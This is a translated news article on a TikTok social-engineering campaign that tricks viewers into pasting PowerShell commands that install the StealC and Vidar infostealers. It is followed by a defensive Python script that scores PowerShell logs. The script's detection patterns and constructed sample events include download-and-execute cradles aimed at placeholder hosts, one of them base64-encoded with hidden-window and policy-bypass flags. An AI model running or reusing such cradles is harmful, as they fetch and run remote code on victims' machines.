Social engineering campaign: TikTok videos with malware installation instructions

Trend Micro's virus analysts have detected a campaign on TikTok that instructs victims to install infostealer malware.

Image: Caution sign next to TikTok logo (heise online / dmk)

IT security researchers have tracked down a social engineering campaign on TikTok in which the attackers try to foist malware on their victims. The perpetrators promise cracked software; in the end, however, PowerShell commands land in the victims' clipboard, which the victims execute themselves and thereby allow infostealers to be installed on their machines.

In an analysis, the IT researchers from Trend Micro go into more detail. According to this, the criminals behind the campaign produce what appear to be AI-generated videos that supposedly demonstrate steps for activating software or unlocking premium functions. In reality, the instructions get the viewer to execute PowerShell commands. These commands then download the infostealers StealC and Vidar and install them on the victims' computers.

The attackers look for victims where they spend their time and are receptive to social engineering: on social networks. While previous campaigns could be recognized by injected JavaScript on compromised landing pages, the perpetrators of this TikTok-based malware campaign rely on pure social engineering using nothing but video content. TikTok's huge user base and algorithmically amplified reach make it an ideal breeding ground for cyber criminals, Trend Micro's IT researchers explain.

Attackers achieve broad distribution without having to worry about their infrastructure, they explain further. By using AI-generated content, a campaign can be scaled up instead of just generating isolated incidents. Such videos can be produced quickly and customized for different user segments.


Another striking feature of the observed campaign is that the TikTok videos give verbal instructions that lead the victims to execute PowerShell commands on their own machines. As a result, no malicious code is visible on the platform that security software could target.

One of the videos has received more than 20,000 likes and, according to the virus analysts, more than 100 comments. TikTok analytics even showed a reach of 500,000 views, so the malicious videos do indeed travel widely. Trend Micro does not state how many viewers of the malicious videos were actually infected with the infostealers. The IT researchers do, however, discuss exactly how the PowerShell scripts work and provide some indicators of compromise (IOCs) at the end of their analysis.

Last year, cybercriminals tried something similar with YouTube videos. They promised cracked and illegally copied video games on channels that had been taken over from their regular owners, for example by phishing. The links, however, led to malware, again infostealers: the IT researchers found Lumma Stealer, StealC and Vidar. The attack technique used in the current malware campaign, placing commands in the victim's clipboard that they then execute themselves according to instructions, has been quite popular for around a year. IT security researchers from Proofpoint warned about this attack technique in the middle of last year.
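Because the commands in this kind of campaign never touch the platform and are typed or pasted by the victim, the place defenders can still see them is the endpoint's own PowerShell logging. The following triage script is an added example written for this article; it is not code from heise online or from Trend Micro's analysis, and the log lines it processes are constructed for the demonstration. It assumes events exported as JSON with the field names shown (`EventID`, `Host`, `CommandLine` for process creation, `ScriptBlockText` for script block logging), which is this example's own convention rather than any particular SIEM's schema. It decodes `-EncodedCommand` payloads before matching, so that the download-and-execute pattern the article describes is scored on the cleartext rather than on a base64 blob.

```python
import base64
import json
import re

# Hypothetical log shape: one JSON object per line. Field names are this
# example's assumption, not a real product's schema. Domains are placeholders.
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
CRADLE_RE = re.compile(
    r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|downloadfile|net\.webclient)\b",
    re.IGNORECASE,
)
EXEC_RE = re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE)
EVASION_RE = re.compile(
    r"(?:-w(?:indowstyle)?\s+hidden|-e(?:xecutionpolicy|p)\s+bypass|-nop(?:rofile)?\b)",
    re.IGNORECASE,
)


def decode_encoded_command(text):
    """Return the UTF-16LE script hidden behind -EncodedCommand (or -e/-enc), else None."""
    match = ENCODED_RE.search(text)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command(text):
    """Score one command line or script block. Returns (score, reasons, decoded_script)."""
    decoded = decode_encoded_command(text)
    # Replace the base64 blob so it cannot accidentally match a keyword regex;
    # the decoded script is appended and inspected in cleartext instead.
    haystack = ENCODED_RE.sub("-EncodedCommand <blob>", text)
    if decoded:
        haystack += "\n" + decoded
    score, reasons = 0, []
    if decoded is not None:
        score += 2
        reasons.append("encoded command (decoded for inspection)")
    has_cradle, has_exec = CRADLE_RE.search(haystack), EXEC_RE.search(haystack)
    if has_cradle and has_exec:
        score += 5
        reasons.append("download cradle piped into execution")
    elif has_cradle:
        score += 2
        reasons.append("remote download")
    for flag in EVASION_RE.findall(haystack):
        score += 1
        reasons.append("evasion flag " + flag)
    return score, reasons, decoded


def triage_logs(lines, threshold=5):
    """Return the events whose score reaches the threshold, with the reasons."""
    findings = []
    for line in lines:
        event = json.loads(line)
        text = event.get("CommandLine") or event.get("ScriptBlockText") or ""
        score, reasons, decoded = analyze_command(text)
        if score >= threshold:
            findings.append({"host": event["Host"], "event_id": event["EventID"],
                             "score": score, "reasons": reasons, "decoded": decoded})
    return findings


# Constructed sample events: an admin one-liner, a pasted cradle, an encoded
# hidden-window variant, a directory query and a plain download without execution.
_ENCODED = base64.b64encode(
    "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://premium.example.invalid/a')"
    .encode("utf-16le")).decode()
SAMPLE_LOGS = [
    json.dumps({"EventID": 4688, "Host": "ws01",
                "CommandLine": 'powershell.exe -NoProfile -Command "Get-ChildItem C:\\Users | Measure-Object"'}),
    json.dumps({"EventID": 4104, "Host": "ws02",
                "ScriptBlockText": "iex (iwr 'http://activation.example.invalid/p.ps1' -UseBasicParsing)"}),
    json.dumps({"EventID": 4688, "Host": "ws03",
                "CommandLine": "powershell.exe -w hidden -ep bypass -enc " + _ENCODED}),
    json.dumps({"EventID": 4104, "Host": "ws04",
                "ScriptBlockText": "Import-Module ActiveDirectory; Get-ADUser -Filter *"}),
    json.dumps({"EventID": 4104, "Host": "ws05",
                "ScriptBlockText": "Invoke-WebRequest -Uri 'https://updates.example.invalid/agent.msi' -OutFile C:\\Temp\\agent.msi"}),
]

if __name__ == "__main__":
    for finding in triage_logs(SAMPLE_LOGS):
        print(finding["host"], finding["event_id"], finding["score"], "; ".join(finding["reasons"]))
        if finding["decoded"]:
            print("  decoded:", finding["decoded"])
```

The scoring deliberately keeps a plain `Invoke-WebRequest -OutFile` below the threshold, since software updaters do that routinely; what separates the campaign's commands is the download feeding straight into `iex`, usually alongside a hidden window or an execution-policy bypass. Pair this with process-creation events whose parent is `explorer.exe` or the Run dialog to narrow it to commands a user pasted by hand.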

(dmk)


This article was originally published in German. It was translated with technical assistance and editorially reviewed before publication.